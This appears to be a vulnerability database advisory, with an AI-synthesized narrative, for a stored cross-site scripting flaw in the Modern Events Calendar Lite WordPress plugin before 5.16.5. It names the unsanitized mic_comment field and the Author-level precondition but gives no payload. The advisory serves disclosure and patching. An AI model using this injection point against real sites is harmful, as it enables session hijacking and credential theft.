Modern Events Calendar Lite < 5.16.5 - Authenticated Stored Cross-Site Scripting (XSS)
Description
Unvalidated input and lack of output encoding in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not sanitise the mic_comment field (Notes on time) when adding/editing an event, allowing users with privilege as low as author to add events with a Cross-Site Scripting payload in them, which will be triggered in the frontend when viewing the event.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Authenticated stored XSS in Modern Events Calendar Lite <5.16.5 via unsanitized mic_comment field, triggered when viewing events.
Vulnerability
The Modern Events Calendar Lite WordPress plugin versions before 5.16.5 fail to sanitize the mic_comment (Notes on time) field when creating or editing events. This lack of input validation and output encoding allows users with the Author role (or higher) to inject arbitrary JavaScript into the field. The payload is stored and executed in the front-end when any user views the crafted event [1].
Exploitation
An attacker needs a WordPress account with at least Author-level privileges, enabling them to add or edit events. The attacker inserts a Cross-Site Scripting (XSS) payload into the mic_comment field via the event editor interface; no special network access or user interaction beyond viewing the event is required [1].
Impact
Successful exploitation leads to stored XSS, which can result in session hijacking, credential theft, defacement, or redirection to malicious sites in the context of the victim's browser. The attack compromises the confidentiality and integrity of the WordPress site for any user who views the infected event [1].
Mitigation
The vulnerability is fixed in version 5.16.5, released on January 27, 2021. Users should update the Modern Events Calendar Lite plugin to version 5.16.5 or later. No other workaround is documented in the available references, and the plugin did not receive a patch prior to this version [1].
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- WordPress/Modern Events Calendar Litedescription
- Range: <5.16.5
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Unvalidated input and lack of output encoding in the mic_comment field allows stored Cross-Site Scripting."
Attack vector
An attacker with author-level privileges (or higher) can create or edit an event and inject a Cross-Site Scripting (XSS) payload into the `mic_comment` field. Because the plugin fails to sanitize this input and does not encode the output, the payload is stored in the database and executed in the victim's browser when any frontend user views the event [ref_id=1]. No special network position is required beyond normal WordPress access.
Affected code
The vulnerability resides in the `mic_comment` field (Notes on time) of the Modern Events Calendar Lite plugin. The plugin did not sanitize this field when adding or editing an event [ref_id=1].
What the fix does
The advisory states that version 5.16.5 fixed the issue [ref_id=1]. No patch diff is provided in the bundle, but the fix presumably adds input sanitization and/or output encoding for the `mic_comment` field to prevent stored XSS. The vendor initially disputed the issue, claiming a role manager plugin should be used, but later released the fix after escalation to the WordPress Plugins Team [ref_id=1].
Preconditions
- authAttacker must have at least Author-level privileges on the WordPress site
- configThe Modern Events Calendar Lite plugin must be installed and active with a version before 5.16.5
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- wpscan.com/vulnerability/0f9ba284-5d7e-4092-8344-c68316b0146fmitrex_refsource_MISC
News mentions
0No linked articles in our index yet.